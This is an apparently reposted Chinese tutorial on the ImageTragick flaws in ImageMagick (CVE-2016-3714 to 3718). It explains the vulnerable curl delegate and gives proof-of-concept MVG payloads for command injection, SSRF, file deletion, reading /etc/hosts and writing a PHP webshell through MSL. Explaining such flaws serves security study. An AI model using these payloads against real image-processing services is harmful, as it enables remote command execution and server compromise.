19.Imagetragick 命令执行漏洞(CVE-2016–3714)

Posted bmjoker

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了19.Imagetragick 命令执行漏洞(CVE-2016–3714)相关的知识,希望对你有一定的参考价值。

Imagetragick 命令执行漏洞(CVE-2016–3714)

技术分享图片

 

漏洞简介:

 

Imagetragick 命令执行漏洞在16年爆出来以后,wooyun上面也爆出了数个被该漏洞影响的大厂商,像腾讯,

新浪,慕课....影响巨大,这里贴出wooyun上关于此漏洞的案例:http://wooyun.org/bugs/wooyun-2016-0205125

 

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。

但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。

国外的安全人员为此新建了一个网站: https://imagetragick.com/

与这个漏洞相关的CVE有CVE-2016-3714、CVE-2016-3715、CVE-2016-3716、CVE-2016-3717,

其中最严重的就是CVE-2016-3714,利用这个漏洞可以造成远程命令执行的危害。

影响版本:

ImageMagick 6.5.7-8 2012-08-17(手工测试风险存在)

ImageMagick 6.7.7-10 2014-03-06(手工测试风险存在)

低版本至6.9.3-9 released 2016-04-30

漏洞分析:

具体漏洞原理就不详细说了,百度一大堆,贴一个:https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html

ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行,

漏洞发生的地方:

<delegate decode="https" command="&quot;curl&quot; -s -k -o &quot;%o&quot; &quot;https:%M&quot;"/>

它在解析https图片的时候,使用了curl命令将其下载,我们看到%M被直接放在curl的最后一个参数内。ImageMagick默认支持一种图片格式,

叫mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。

所以我们可以构造一个.mvg格式的图片(但文件名可以不为.mvg,比如下图中包含payload的文件的文件名为1.gif,而ImageMagick会根据其

内容识别为mvg图片),并在https://后面闭合双引号,写入自己要执行的命令:

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://"|id; ")‘
pop graphic-context

这样,ImageMagick在正常执行图片转换、处理的时候就会触发漏洞,执行我们的命令

另外几个CVE也大同小异,

CVE-2016-3718,他是利用mvg格式中可以包含url的特点,进行SSRF攻击,POC如下:

push graphic-context
viewbox 0 0 640 480
fill url(http://example.com/)
pop graphic-context

CVE-2016-3715是利用ImageMagick支持的ephemeral协议,来删除任意文件,POC如下:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 ephemeral:/tmp/delete.txt
popgraphic-context

CVE-2016-3716是利用ImageMagick支持的msl协议,来进行文件的读取和写入。利用这个漏洞,

可以将任意文件写为任意文件,比如将图片写为一个.php后缀的webshell。

特别说明的是,msl协议是读取一个msl格式的xml文件,并根据其内容执行一些操作:

file_move.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 msl:/tmp/msl.txt
popgraphic-context

/tmp/msl.txt
-=-=-=-=-=-=-=-=-
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>

CVE-2016-3717是利用ImageMagick支持的label协议来造成本地文件读取漏洞:

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 label:@/etc/hosts
pop graphic-context

 

以上是关于19.Imagetragick 命令执行漏洞(CVE-2016–3714)的主要内容,如果未能解决你的问题,请参考以下文章

H2Miner利用SaltStack漏洞获利超370万人民币,门罗币仍为最受黑客喜爱目标

bash远程命令执行漏洞 怎么修复

命令执行漏洞

九漏洞挖掘与代码审计命令执行漏洞原理

详解命令执行漏洞

命令执行漏洞